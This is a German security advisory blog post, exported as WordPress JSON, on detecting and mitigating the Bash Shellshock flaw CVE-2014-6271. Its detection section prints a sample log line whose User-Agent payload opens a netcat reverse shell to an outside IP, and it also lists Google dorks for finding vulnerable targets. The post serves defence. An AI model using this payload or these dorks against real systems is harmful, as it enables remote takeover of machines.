{"id":985,"date":"2014-09-26T09:50:31","date_gmt":"2014-09-26T09:50:31","guid":{"rendered":"http:\/\/www.bsk-consulting.de\/?p=985"},"modified":"2022-10-04T15:54:15","modified_gmt":"2022-10-04T13:54:15","slug":"bash-schwachstelle-cve-2014-6271-shell-shock-erkennen","status":"publish","type":"post","link":"https:\/\/www.nextron-systems.com\/2014\/09\/26\/bash-schwachstelle-cve-2014-6271-shell-shock-erkennen\/","title":{"rendered":"Bash Schwachstelle CVE-2014-6271 Shell Shock erkennen"},"content":{"rendered":"<p>[et_pb_section fb_built=&#8221;1&#8243; admin_label=&#8221;section&#8221; _builder_version=&#8221;4.16&#8243; global_colors_info=&#8221;{}&#8221; da_is_popup=&#8221;off&#8221; da_exit_intent=&#8221;off&#8221; da_has_close=&#8221;on&#8221; da_alt_close=&#8221;off&#8221; da_dark_close=&#8221;off&#8221; da_not_modal=&#8221;on&#8221; da_is_singular=&#8221;off&#8221; da_with_loader=&#8221;off&#8221; da_has_shadow=&#8221;on&#8221; da_disable_devices=&#8221;off|off|off&#8221;][et_pb_row admin_label=&#8221;row&#8221; _builder_version=&#8221;4.16&#8243; background_size=&#8221;initial&#8221; background_position=&#8221;top_left&#8221; background_repeat=&#8221;repeat&#8221; global_colors_info=&#8221;{}&#8221;][et_pb_column type=&#8221;4_4&#8243; _builder_version=&#8221;4.16&#8243; custom_padding=&#8221;|||&#8221; global_colors_info=&#8221;{}&#8221; custom_padding__hover=&#8221;|||&#8221;][et_pb_text admin_label=&#8221;Text&#8221; _builder_version=&#8221;4.18.0&#8243; background_size=&#8221;initial&#8221; background_position=&#8221;top_left&#8221; background_repeat=&#8221;repeat&#8221; hover_enabled=&#8221;0&#8243; global_colors_info=&#8221;{}&#8221; sticky_enabled=&#8221;0&#8243;]<div id=\"attachment_991\" style=\"width: 160px\" class=\"wp-caption alignright\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-991\" class=\"wp-image-991 size-thumbnail\" src=\"\/wp-content\/uploads\/2014\/09\/ByVh24fCcAAy7mT-150x150.png\" alt=\"CVE-2014-6271 Bash Shell Shock\" width=\"150\" height=\"150\" \/><p id=\"caption-attachment-991\" class=\"wp-caption-text\">Shell Shock Logo &#8211; Bild: Paul M. Gerhardt<\/p><\/div><\/p>\n<p>Dieser Artikel enth\u00e4lt Information dazu, wie Sie die bash Schwachstelle CVE-2014-6271 Shell Shock erkennen und behandeln k\u00f6nnen.<\/p>\n<h2>Betroffene Systeme<\/h2>\n<p>Grunds\u00e4tzlich sind alle Systeme betroffen, die eine \u201cbash\u201d einsetzen, also<\/p>\n<ul>\n<li>Linux<\/li>\n<li>Unix<\/li>\n<li>AIX<\/li>\n<li>Solaris<\/li>\n<li>HPUX<\/li>\n<li>D.h. auch viele Embedded Systems, Network Devices, Appliances<\/li>\n<\/ul>\n<p>Die Remote Ausnutzung der Schwachstelle bedarf aber eines remote erreichbaren Dienstes, der in einer bestimmten Form Gebrauch von der Bash macht.\u00a0Aus unserer Sicht stehen besonders all jene Systeme im Fokus , die eine simple Web Applikation anbieten oder eine Web Applikation, die systemnahe Befehle ausf\u00fchrt.<br \/>\nBeispiele:<\/p>\n<ul>\n<li>Druckserver<\/li>\n<li>Video-Kameras<\/li>\n<li>Haustechnik<\/li>\n<li>Anzeigesysteme<\/li>\n<li>ILO Boards<\/li>\n<li>ICS und SCADA Systeme<\/li>\n<li>Appliances (propriet\u00e4r mit Web Interface und reduziertem Remote Zugang)<\/li>\n<li>Usw.<\/li>\n<\/ul>\n<p>Aber auch jegliche einfache Web Applikation, die \u201cpopen()\u201d oder \u201csystem()\u201d calls verwendet. Auch finden sich des \u00f6fteren aktive Skripts in \u201ccgi-bin\u201d Ordnern, die entweder in Perl oder anderen eher empfindlichen Sprachen verfasst sind.<br \/>\nGro\u00dfe Web Frameworks wie CMS Systeme, J2EE oder Web Sphere sind mit hoher Wahrscheinlichkeit nicht verwundbar.<\/p>\n<h2>Kritikalit\u00e4t<\/h2>\n<p>Auch wenn der Angriffsvektor vielf\u00e4ltig ist und es keinen einfachen Weg der Erkennung von anf\u00e4lligen Anwendung gibt, ist das Schadenspotential erheblich. Diese Einsch\u00e4tzung liegt darin begr\u00fcndet, dass wenn eine verwundbare Applikation gefunden wird, das dazugeh\u00f6rige Exploit extrem simpel anzuwenden sein wird. Es kann ein einfacher URL Aufruf oder eine \u201ccurl\u201d Kommandozeile sein, die zur Ausnutzung der Schwachstelle ben\u00f6tigt wird.<br \/>\nDas Schadenspotential des Angriffs ist im Gegensatz zu Heartbleed auch deshalb enorm, weil der Angreifer den schadhaften Code direkt unter dem Benutzer des verwundbaren Dienstes ausf\u00fchren kann und im schlimmsten Fall das System direkt komplett \u00fcbernommen wird. Das erm\u00f6glicht auch die Entwicklung von W\u00fcrmern, die gezielt die bereits bekannten Schwachstellen diverser Produkte ausnutzt und sich dann \u00fcber diese Ger\u00e4te verbreitet.<br \/>\nDie gro\u00dfe Schwierigkeit besteht dann darin, solche \u201cneuartigen\u201d W\u00fcrmer effizient und koordiniert zu entfernen, denn Appliances, Haustechnik und andere Embedded Devices stellten Sicherheitsorganisationen in der Vergangenheit bereits bei W\u00fcrmern im Windows Umfeld vor gro\u00dfe Herausforderungen.<br \/>\nVektor: Vielf\u00e4ltig<br \/>\nSchaden: Hoch<br \/>\nKomplexit\u00e4t: Niedrig<br \/>\nRemote ausnutzbar: Ja (wenn remote angebotener Dienst bash Funktionen nutzt)<\/p>\n<h2>Erkennung<\/h2>\n<p>Das Problem mit dieser Schwachstelle ist, dass es keinen klaren Check oder Indikator auf Systemebene geben kann, denn die Schwachstelle ist nicht auf ein einzelnes verwundbares Skript oder Produkt beschr\u00e4nkt. Selbst die Ausnutzung \u00fcber das DHCP Protokoll wurde bereits in einem POC demonstriert.<br \/>\nVerwundbare Skripte und Applikationen k\u00f6nnten in allen m\u00f6glichen Produkten stecken.<\/p>\n<h3>Netzwerkebene<\/h3>\n<p>Die einzig sinnvolle\u00a0L\u00f6sung ist derzeit die Erkennung im Netzwerkverkehr mittels IDS\/IPS Systemen, die schadhafte Anfragen im HTTP Datenstrom oder anderen Protokollen an Hand von Signaturen erkennen und n\u00f6tigenfalls die Verbindung direkt blocken k\u00f6nnen, wenn sie \u201cinline\u201d betrieben werden.<\/p>\n<h3>Systemebene<\/h3>\n<p>Eine Erkennung auf Systemebene ist nur schwer m\u00f6glich, da die schadhaften Codes in die Umgebungsvariablen des Benutzers injiziert werden, unter dessen Konto der ausgenutzte Dienst l\u00e4uft. Die Codes sind also nur im Speicher des Systems vorhanden.<br \/>\nDas System Diagnose Werkzeug \u201csysdig\u201d hat bereits <a title=\"Sysdig Shell Shock detection\" href=\"http:\/\/draios.com\/shellshock-sysdig\/\" target=\"_blank\" rel=\"noopener noreferrer\">eine L\u00f6sung<\/a> integriert, allerdings ist sie nur f\u00fcr die \u00dcberwachung von Einzelsystemen geeignet und bedarf noch aufw\u00e4ndiger Zusatzarbeiten, um die von Sysdig generierten Outputs zentral in ein Security Monitoring zu integrieren.<br \/>\nWenn Apache Access Logs in einem Security Monitoring (SIEM) zusammengef\u00fchrt werden, lohnt es sich diese Logfiles zu \u00fcberwachen. Die Zeilen eines Angriffs und der derzeit bekannten W\u00fcrmer sehen folgenderma\u00dfen aus (im Listing wird die Injection \u00fcber den User-Agent String vorgenommen, der na\u00fctrlich im Log Format definiert sein muss):<\/p>\n<pre>\n213.5.67.223\u00a0- - [26\/Sep\/2014:10:37:34 +0200] \"GET \/cgi-bin\/poc.cgi HTTP\/1.1\" 200 1066 \"-\" \"() { :; }; \/bin\/nc -e \/bin\/sh 213.5.67.223\u00a04444 &amp;\u201d\n<\/pre>\n<p>Eine Suche nach folgendem Regex in den Access Logs, kann schadhafte Request sichtbar machen:<\/p>\n<pre>\n\\(\\)\\s\\{.*;\\s*\\};\n<\/pre>\n<h3>Verwundbarkeit feststellen<\/h3>\n<p>Um zu testen, ob die Bash eines Systems \u00fcberhaupt verwundbar w\u00e4re, wenn ein angreifer von au\u00dfen Codes injizieren kann, eignet sich folgender Aufruf:<\/p>\n<pre>\nenv x='() { :;}; echo vulnerable' bash -c 'echo hello'\n<\/pre>\n<p>Wenn die Bash verwundbar ist, wird ein \u201cvulnerable\u201d ausgegeben\u201d, ansonsten wird ein Fehler angezeigt.<\/p>\n<h2>Schutzm\u00f6glichkeiten<\/h2>\n<h3>Patching<\/h3>\n<p>Diverse Hersteller von Linux Distributionen bieten bereits Patche an. Da viele der sofort bereitgestellten Patches keine Wirkung hatten, wurde ein neuer CVE-2014-7169 ge\u00f6ffnet, um die zwar gepatche aber dennoch verwundbare Bash Thematik zu behandeln. Diese CVE Nummer sollte also ebenso im Auge behalten werden.<\/p>\n<h3>Blocking via IPS \/ WAF<\/h3>\n<p>Wie oben bereits beschrieben, sehen wir die einzig derzeit verf\u00fcgbare Schutzfunktion in IDS\/IPS Systemen und WAFs. (Web Application Firewalls)<br \/>\nSowohl die Open Source L\u00f6sungen Snort und Bro als auch professionelle IDS Systeme stehen Signaturen bereit, die bei einem \u201cinline\u201d installierten System auf \u201cblocking\u201d konfiguriert werden k\u00f6nnen. Die derzeitigen Angriffe gegen Webserver sind im Netzwerktraffic klar erkennbar und gut mit Regul\u00e4ren Ausdr\u00fccken kenntlich zu machen bzw. in Signaturen zu definieren.<\/p>\n<h2>Google Dorks<\/h2>\n<p>Mit Hilfe dieser Google Suchen k\u00f6nnen verwundbare Zielsysteme gefunden werden.<\/p>\n<pre>\ninurl:cgi-bin \u201cGATEWAY_INTERFACE = CGI\u201d\ninurl:\u201dserver-status\u201d intitle:apache \u201ccgi-bin\u201d\nsitemap.xml filetype:xml intext:\u201dcgi-bin\u201d\nfiletype:sh inurl:cgi-bin\n<\/pre>\n<h2>Weitere Informationen<\/h2>\n<p><a title=\"Shell Shock Information\" href=\"https:\/\/community.rapid7.com\/community\/infosec\/blog\/2014\/09\/25\/bash-ing-into-your-network-investigating-cve-2014-6271\" target=\"_blank\" rel=\"noopener noreferrer\">Informationen von Rapid7 (Metasploit)<\/a><br \/>\n<a title=\"Bash Shell Shock Meldung bei heise.de\" href=\"http:\/\/www.heise.de\/security\/meldung\/Bash-Luecke-ShellShock-ist-noch-nicht-ausgestanden-2403607.html\" target=\"_blank\" rel=\"noopener noreferrer\">Shell Shock Meldung auf Heise<\/a><br \/>\n<a href=\"https:\/\/www.invisiblethreat.ca\/2014\/09\/cve-2014-6271\/\" title=\"Shell Shock Examples\" target=\"_blank\" rel=\"noopener noreferrer\">Beispiele f\u00fcr die Ausnutzung der Schwachstelle<\/a><\/p>\n<h2>Auf dem Laufenden bleiben<\/h2>\n<p>Heise Security berichtet ausgiebig \u00fcber die \u201cShell Shock\u201d Schwachstelle.<br \/>\n<a href=\"http:\/\/www.heise.de\/security\/suche\/?q=ShellShock&amp;rm=search\" target=\"_blank\" rel=\"noopener noreferrer\">http:\/\/www.heise.de\/security\/suche\/?q=ShellShock&amp;rm=search<\/a><br \/>\nWir empfehlen auch den Twitter Stream zur Suche \u201cCVE-2014-6271\u201d.<br \/>\n<a href=\"https:\/\/twitter.com\/search?q=CVE-2014-6271\" target=\"_blank\" rel=\"noopener noreferrer\">https:\/\/twitter.com\/search?q=CVE-2014-6271<\/a>[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Dieser Artikel enth\u00e4lt Information dazu, wie Sie die bash Schwachstelle CVE-2014-6271 Shell Shock erkennen und behandeln k\u00f6nnen. Betroffene Systeme Grunds\u00e4tzlich sind alle Systeme betroffen, die eine \u201cbash\u201d einsetzen, also Linux Unix AIX Solaris HPUX D.h. auch viele Embedded Systems, Network Devices, Appliances Die Remote Ausnutzung der Schwachstelle bedarf aber eines remote erreichbaren Dienstes, der in einer bestimmten Form Gebrauch von der Bash macht.\u00a0Aus unserer Sicht stehen besonders all jene Systeme im Fokus , die eine simple Web Applikation anbieten oder eine Web Applikation, die systemnahe Befehle ausf\u00fchrt. Beispiele: Druckserver Video-Kameras Haustechnik Anzeigesysteme ILO Boards ICS und SCADA Systeme Appliances (propriet\u00e4r mit Web Interface und reduziertem Remote Zugang) Usw. Aber auch jegliche einfache Web Applikation, die \u201cpopen()\u201d oder \u201csystem()\u201d calls verwendet. Auch finden sich des \u00f6fteren aktive Skripts in \u201ccgi-bin\u201d Ordnern, die entweder in Perl oder anderen eher empfindlichen Sprachen verfasst sind. Gro\u00dfe Web Frameworks wie CMS Systeme, J2EE oder Web Sphere sind mit hoher Wahrscheinlichkeit nicht verwundbar. Kritikalit\u00e4t Auch wenn der Angriffsvektor vielf\u00e4ltig ist und es keinen einfachen Weg der Erkennung von anf\u00e4lligen Anwendung gibt, ist das Schadenspotential erheblich. Diese Einsch\u00e4tzung liegt darin begr\u00fcndet, dass wenn eine verwundbare Applikation gefunden wird, das dazugeh\u00f6rige Exploit extrem simpel anzuwenden sein wird. Es [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"[caption id=\"attachment_991\" align=\"alignright\" width=\"150\"]<a href=\"https:\/\/www.nextron-systems.com\/wp-content\/uploads\/2014\/09\/ByVh24fCcAAy7mT.png\"><img class=\"wp-image-991 size-thumbnail\" src=\"http:\/\/www.bsk-consulting.de\/wp-content\/uploads\/2014\/09\/ByVh24fCcAAy7mT-150x150.png\" alt=\"CVE-2014-6271 Bash Shell Shock\" width=\"150\" height=\"150\" \/><\/a>Shell Shock Logo - Bild: Paul M. Gerhardt[\/caption]\r\nDieser Artikel enth\u00e4lt Information dazu, wie Sie die bash Schwachstelle CVE-2014-6271 Shell Shock erkennen und behandeln k\u00f6nnen.\r\n<h2>Betroffene Systeme<\/h2>\r\nGrunds\u00e4tzlich sind alle Systeme betroffen, die eine \u201cbash\u201d einsetzen, also\r\n<ul>\r\n\t<li>Linux<\/li>\r\n\t<li>Unix<\/li>\r\n\t<li>AIX<\/li>\r\n\t<li>Solaris<\/li>\r\n\t<li>HPUX<\/li>\r\n\t<li>D.h. auch viele Embedded Systems, Network Devices, Appliances<\/li>\r\n<\/ul>\r\nDie Remote Ausnutzung der Schwachstelle bedarf aber eines remote erreichbaren Dienstes, der in einer bestimmten Form Gebrauch von der Bash macht.\u00a0Aus unserer Sicht stehen besonders all jene Systeme im Fokus , die eine simple Web Applikation anbieten oder eine Web Applikation, die systemnahe Befehle ausf\u00fchrt.\r\nBeispiele:\r\n<ul>\r\n\t<li>Druckserver<\/li>\r\n\t<li>Video-Kameras<\/li>\r\n\t<li>Haustechnik<\/li>\r\n\t<li>Anzeigesysteme<\/li>\r\n\t<li>ILO Boards<\/li>\r\n\t<li>ICS und SCADA Systeme<\/li>\r\n\t<li>Appliances (propriet\u00e4r mit Web Interface und reduziertem Remote Zugang)<\/li>\r\n\t<li>Usw.<\/li>\r\n<\/ul>\r\nAber auch jegliche einfache Web Applikation, die \u201cpopen()\u201d oder \u201csystem()\u201d calls verwendet. Auch finden sich des \u00f6fteren aktive Skripts in \u201ccgi-bin\u201d Ordnern, die entweder in Perl oder anderen eher empfindlichen Sprachen verfasst sind.\r\nGro\u00dfe Web Frameworks wie CMS Systeme, J2EE oder Web Sphere sind mit hoher Wahrscheinlichkeit nicht verwundbar.\r\n<h2>Kritikalit\u00e4t<\/h2>\r\nAuch wenn der Angriffsvektor vielf\u00e4ltig ist und es keinen einfachen Weg der Erkennung von anf\u00e4lligen Anwendung gibt, ist das Schadenspotential erheblich. Diese Einsch\u00e4tzung liegt darin begr\u00fcndet, dass wenn eine verwundbare Applikation gefunden wird, das dazugeh\u00f6rige Exploit extrem simpel anzuwenden sein wird. Es kann ein einfacher URL Aufruf oder eine \u201ccurl\u201d Kommandozeile sein, die zur Ausnutzung der Schwachstelle ben\u00f6tigt wird.\r\nDas Schadenspotential des Angriffs ist im Gegensatz zu Heartbleed auch deshalb enorm, weil der Angreifer den schadhaften Code direkt unter dem Benutzer des verwundbaren Dienstes ausf\u00fchren kann und im schlimmsten Fall das System direkt komplett \u00fcbernommen wird. Das erm\u00f6glicht auch die Entwicklung von W\u00fcrmern, die gezielt die bereits bekannten Schwachstellen diverser Produkte ausnutzt und sich dann \u00fcber diese Ger\u00e4te verbreitet.\r\nDie gro\u00dfe Schwierigkeit besteht dann darin, solche \u201cneuartigen\u201d W\u00fcrmer effizient und koordiniert zu entfernen, denn Appliances, Haustechnik und andere Embedded Devices stellten Sicherheitsorganisationen in der Vergangenheit bereits bei W\u00fcrmern im Windows Umfeld vor gro\u00dfe Herausforderungen.\r\nVektor: Vielf\u00e4ltig\r\nSchaden: Hoch\r\nKomplexit\u00e4t: Niedrig\r\nRemote ausnutzbar: Ja (wenn remote angebotener Dienst bash Funktionen nutzt)\r\n<h2>Erkennung<\/h2>\r\nDas Problem mit dieser Schwachstelle ist, dass es keinen klaren Check oder Indikator auf Systemebene geben kann, denn die Schwachstelle ist nicht auf ein einzelnes verwundbares Skript oder Produkt beschr\u00e4nkt. Selbst die Ausnutzung \u00fcber das DHCP Protokoll wurde bereits in einem POC demonstriert.\r\nVerwundbare Skripte und Applikationen k\u00f6nnten in allen m\u00f6glichen Produkten stecken.\r\n<h3>Netzwerkebene<\/h3>\r\nDie einzig sinnvolle\u00a0L\u00f6sung ist derzeit die Erkennung im Netzwerkverkehr mittels IDS\/IPS Systemen, die schadhafte Anfragen im HTTP Datenstrom oder anderen Protokollen an Hand von Signaturen erkennen und n\u00f6tigenfalls die Verbindung direkt blocken k\u00f6nnen, wenn sie \u201cinline\u201d betrieben werden.\r\n<h3>Systemebene<\/h3>\r\nEine Erkennung auf Systemebene ist nur schwer m\u00f6glich, da die schadhaften Codes in die Umgebungsvariablen des Benutzers injiziert werden, unter dessen Konto der ausgenutzte Dienst l\u00e4uft. Die Codes sind also nur im Speicher des Systems vorhanden.\r\nDas System Diagnose Werkzeug \u201csysdig\u201d hat bereits <a title=\"Sysdig Shell Shock detection\" href=\"http:\/\/draios.com\/shellshock-sysdig\/\" target=\"_blank\" rel=\"noopener noreferrer\">eine L\u00f6sung<\/a> integriert, allerdings ist sie nur f\u00fcr die \u00dcberwachung von Einzelsystemen geeignet und bedarf noch aufw\u00e4ndiger Zusatzarbeiten, um die von Sysdig generierten Outputs zentral in ein Security Monitoring zu integrieren.\r\nWenn Apache Access Logs in einem Security Monitoring (SIEM) zusammengef\u00fchrt werden, lohnt es sich diese Logfiles zu \u00fcberwachen. Die Zeilen eines Angriffs und der derzeit bekannten W\u00fcrmer sehen folgenderma\u00dfen aus (im Listing wird die Injection \u00fcber den User-Agent String vorgenommen, der na\u00fctrlich im Log Format definiert sein muss):\r\n[cc lang=bash]\r\n213.5.67.223\u00a0- - [26\/Sep\/2014:10:37:34 +0200] \"GET \/cgi-bin\/poc.cgi HTTP\/1.1\" 200 1066 \"-\" \"() { :; }; \/bin\/nc -e \/bin\/sh 213.5.67.223\u00a04444 &\u201d\r\n[\/cc]\r\nEine Suche nach folgendem Regex in den Access Logs, kann schadhafte Request sichtbar machen:\r\n[cc lang=bash]\r\n()s{.*;s*};\r\n[\/cc]\r\n<h3>Verwundbarkeit feststellen<\/h3>\r\nUm zu testen, ob die Bash eines Systems \u00fcberhaupt verwundbar w\u00e4re, wenn ein angreifer von au\u00dfen Codes injizieren kann, eignet sich folgender Aufruf:\r\n[cc lang=bash]\r\nenv x='() { :;}; echo vulnerable' bash -c 'echo hello'\r\n[\/cc]\r\nWenn die Bash verwundbar ist, wird ein \u201cvulnerable\u201d ausgegeben\u201d, ansonsten wird ein Fehler angezeigt.\r\n<h2>Schutzm\u00f6glichkeiten<\/h2>\r\n<h3>Patching<\/h3>\r\nDiverse Hersteller von Linux Distributionen bieten bereits Patche an. Da viele der sofort bereitgestellten Patches keine Wirkung hatten, wurde ein neuer CVE-2014-7169 ge\u00f6ffnet, um die zwar gepatche aber dennoch verwundbare Bash Thematik zu behandeln. Diese CVE Nummer sollte also ebenso im Auge behalten werden.\r\n<h3>Blocking via IPS \/ WAF<\/h3>\r\nWie oben bereits beschrieben, sehen wir die einzig derzeit verf\u00fcgbare Schutzfunktion in IDS\/IPS Systemen und WAFs. (Web Application Firewalls)\r\nSowohl die Open Source L\u00f6sungen Snort und Bro als auch professionelle IDS Systeme stehen Signaturen bereit, die bei einem \u201cinline\u201d installierten System auf \u201cblocking\u201d konfiguriert werden k\u00f6nnen. Die derzeitigen Angriffe gegen Webserver sind im Netzwerktraffic klar erkennbar und gut mit Regul\u00e4ren Ausdr\u00fccken kenntlich zu machen bzw. in Signaturen zu definieren.\r\n<h2>Google Dorks<\/h2>\r\nMit Hilfe dieser Google Suchen k\u00f6nnen verwundbare Zielsysteme gefunden werden.\r\n[cc lang=bash]\r\ninurl:cgi-bin \u201cGATEWAY_INTERFACE = CGI\u201d\r\ninurl:\u201dserver-status\u201d  intitle:apache \u201ccgi-bin\u201d\r\nsitemap.xml filetype:xml intext:\u201dcgi-bin\u201d\r\nfiletype:sh inurl:cgi-bin\r\n[\/cc]\r\n<h2>Weitere Informationen<\/h2>\r\n<a title=\"Shell Shock Information\" href=\"https:\/\/community.rapid7.com\/community\/infosec\/blog\/2014\/09\/25\/bash-ing-into-your-network-investigating-cve-2014-6271\" target=\"_blank\" rel=\"noopener noreferrer\">Informationen von Rapid7 (Metasploit)<\/a>\r\n<a title=\"Bash Shell Shock Meldung bei heise.de\" href=\"http:\/\/www.heise.de\/security\/meldung\/Bash-Luecke-ShellShock-ist-noch-nicht-ausgestanden-2403607.html\" target=\"_blank\" rel=\"noopener noreferrer\">Shell Shock Meldung auf Heise<\/a>\r\n<a href=\"https:\/\/www.invisiblethreat.ca\/2014\/09\/cve-2014-6271\/\" title=\"Shell Shock Examples\" target=\"_blank\" rel=\"noopener noreferrer\">Beispiele f\u00fcr die Ausnutzung der Schwachstelle<\/a>\r\n<h2>Auf dem Laufenden bleiben<\/h2>\r\nHeise Security berichtet ausgiebig \u00fcber die \u201cShell Shock\u201d Schwachstelle.\r\n<a href=\"http:\/\/www.heise.de\/security\/suche\/?q=ShellShock&rm=search\" target=\"_blank\" rel=\"noopener noreferrer\">http:\/\/www.heise.de\/security\/suche\/?q=ShellShock&rm=search<\/a>\r\nWir empfehlen auch den Twitter Stream zur Suche \u201cCVE-2014-6271\u201d.\r\n<a href=\"https:\/\/twitter.com\/search?q=CVE-2014-6271\" target=\"_blank\" rel=\"noopener noreferrer\">https:\/\/twitter.com\/search?q=CVE-2014-6271<\/a>","_et_gb_content_width":"","footnotes":""},"categories":[327,269],"tags":[469,470,256,471,472,340,473,474],"class_list":["post-985","post","type-post","status-publish","format-standard","hentry","category-alert","category-tutorial","tag-bash","tag-cve-2014-6271","tag-erkennen","tag-patch","tag-schutz","tag-schwachstelle","tag-shell-shock","tag-shellshock"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v24.9 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Bash Schwachstelle CVE-2014-6271 Shell Shock erkennen<\/title>\n<meta name=\"description\" content=\"Informationen wie Sie die Bash Schwachstelle CVE-2014-6271 Shell Shock erkennen und behandeln k\u00f6nnen\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.nextron-systems.com\/2014\/09\/26\/bash-schwachstelle-cve-2014-6271-shell-shock-erkennen\/\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.nextron-systems.com\/2014\/09\/26\/bash-schwachstelle-cve-2014-6271-shell-shock-erkennen\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.nextron-systems.com\/2014\/09\/26\/bash-schwachstelle-cve-2014-6271-shell-shock-erkennen\/\"},\"author\":{\"name\":\"Florian Roth\",\"@id\":\"https:\/\/www.nextron-systems.com\/#\/schema\/person\/4fd503007d60aabaf1ae747502f36919\"},\"headline\":\"Bash Schwachstelle CVE-2014-6271 Shell Shock erkennen\",\"datePublished\":\"2014-09-26T09:50:31+00:00\",\"dateModified\":\"2022-10-04T13:54:15+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.nextron-systems.com\/2014\/09\/26\/bash-schwachstelle-cve-2014-6271-shell-shock-erkennen\/\"},\"wordCount\":991,\"publisher\":{\"@id\":\"https:\/\/www.nextron-systems.com\/#organization\"},\"keywords\":[\"bash\",\"CVE-2014-6271\",\"erkennen\",\"patch\",\"Schutz\",\"Schwachstelle\",\"Shell Shock\",\"shellshock\"],\"articleSection\":[\"Alert\",\"Tutorial\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.nextron-systems.com\/2014\/09\/26\/bash-schwachstelle-cve-2014-6271-shell-shock-erkennen\/\",\"url\":\"https:\/\/www.nextron-systems.com\/2014\/09\/26\/bash-schwachstelle-cve-2014-6271-shell-shock-erkennen\/\",\"name\":\"Bash Schwachstelle CVE-2014-6271 Shell Shock erkennen\",\"isPartOf\":{\"@id\":\"https:\/\/www.nextron-systems.com\/#website\"},\"datePublished\":\"2014-09-26T09:50:31+00:00\",\"dateModified\":\"2022-10-04T13:54:15+00:00\",\"description\":\"Informationen wie Sie die Bash Schwachstelle CVE-2014-6271 Shell Shock erkennen und behandeln k\u00f6nnen\",\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.nextron-systems.com\/2014\/09\/26\/bash-schwachstelle-cve-2014-6271-shell-shock-erkennen\/\"]}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.nextron-systems.com\/#website\",\"url\":\"https:\/\/www.nextron-systems.com\/\",\"name\":\"Nextron Systems\",\"description\":\"We Detect Hackers\",\"publisher\":{\"@id\":\"https:\/\/www.nextron-systems.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.nextron-systems.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.nextron-systems.com\/#organization\",\"name\":\"Nextron Systems GmbH\",\"url\":\"https:\/\/www.nextron-systems.com\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.nextron-systems.com\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.nextron-systems.com\/wp-content\/uploads\/2017\/11\/Nextron_0.2s_inv_symbol_only.png\",\"contentUrl\":\"https:\/\/www.nextron-systems.com\/wp-content\/uploads\/2017\/11\/Nextron_0.2s_inv_symbol_only.png\",\"width\":260,\"height\":260,\"caption\":\"Nextron Systems GmbH\"},\"image\":{\"@id\":\"https:\/\/www.nextron-systems.com\/#\/schema\/logo\/image\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.nextron-systems.com\/#\/schema\/person\/4fd503007d60aabaf1ae747502f36919\",\"name\":\"Florian Roth\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.nextron-systems.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/0dfaa838ce5d82e2e7bfa75ed3f43ae5?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/0dfaa838ce5d82e2e7bfa75ed3f43ae5?s=96&d=mm&r=g\",\"caption\":\"Florian Roth\"},\"description\":\"Florian Roth serves as the Head of Research and Development at Nextron Systems. With a background in IT security since 2000, he has delved deep into nation-state cyber attacks since 2012. Florian has developed the THOR Scanner and actively engages with the community via his Twitter handle @cyb3rops. He has contributed to open-source projects, including 'Sigma', a generic SIEM rule format, and 'LOKI', an open-source scanner. Additionally, he has shared valuable resources like a mapping of APT groups and operations and an Antivirus Event Analysis Cheat Sheet.\",\"url\":\"https:\/\/www.nextron-systems.com\/author\/florian\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Bash Schwachstelle CVE-2014-6271 Shell Shock erkennen","description":"Informationen wie Sie die Bash Schwachstelle CVE-2014-6271 Shell Shock erkennen und behandeln k\u00f6nnen","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.nextron-systems.com\/2014\/09\/26\/bash-schwachstelle-cve-2014-6271-shell-shock-erkennen\/","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.nextron-systems.com\/2014\/09\/26\/bash-schwachstelle-cve-2014-6271-shell-shock-erkennen\/#article","isPartOf":{"@id":"https:\/\/www.nextron-systems.com\/2014\/09\/26\/bash-schwachstelle-cve-2014-6271-shell-shock-erkennen\/"},"author":{"name":"Florian Roth","@id":"https:\/\/www.nextron-systems.com\/#\/schema\/person\/4fd503007d60aabaf1ae747502f36919"},"headline":"Bash Schwachstelle CVE-2014-6271 Shell Shock 